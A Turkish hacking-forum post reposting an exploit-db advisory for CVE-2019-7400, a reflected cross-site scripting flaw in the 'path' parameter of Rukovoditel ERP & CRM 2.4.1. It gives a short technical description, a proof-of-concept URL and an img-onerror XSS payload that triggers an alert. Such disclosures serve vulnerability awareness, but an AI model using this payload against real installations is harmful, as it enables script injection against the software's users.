Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 3 Hafta önce   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting



# Exploit Title/Exploit Başlığı: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting
# Exploit Author/Exploit Yazarı: Javier Olmedo
# Website: https://hackpuntes.com
# Date/Tarih: 2019-03-24
# Vendor/Yapımcı: Rukovoditel
# Software Link/Yazılım Linki: https://sourceforge.net/projects/rukovoditel/
# Affected Version/Etkilenen Versiyonlar: 2.4.1 ve muhtemelen öncesi
# Patched Version/Patch Atılan Versiyonlar: version 2.4.1
# Category/Kategori: Web Application
# Platform: Windows
# Tested on/Test Edilen Sistem: Win10x64 & Kali Linux
# CVE: 2019-7400
# References/Referanslar:
https://hackpuntes.com/cve-2019-7400...ing-reflejado/

# 1. Technical Description/Teknik Açıklama:
index.php kaynağından bir GET isteği ile path parametresi, Reflected Cross-Site Scripting (XSS) ataklarına karşı savunmasızdır.



# 2. Proof Of Concept (PoC):
# http://localhost/index.php?module=it...NERABLE%22)%3E

# 3. Payload
# "><img src=a onerror=alert("VULNERABLE")>



Exploit Linki:
https://www.exploit-db.com/exploits/46608



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Teşekkür

ivanwasilevic, KHAGAN Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau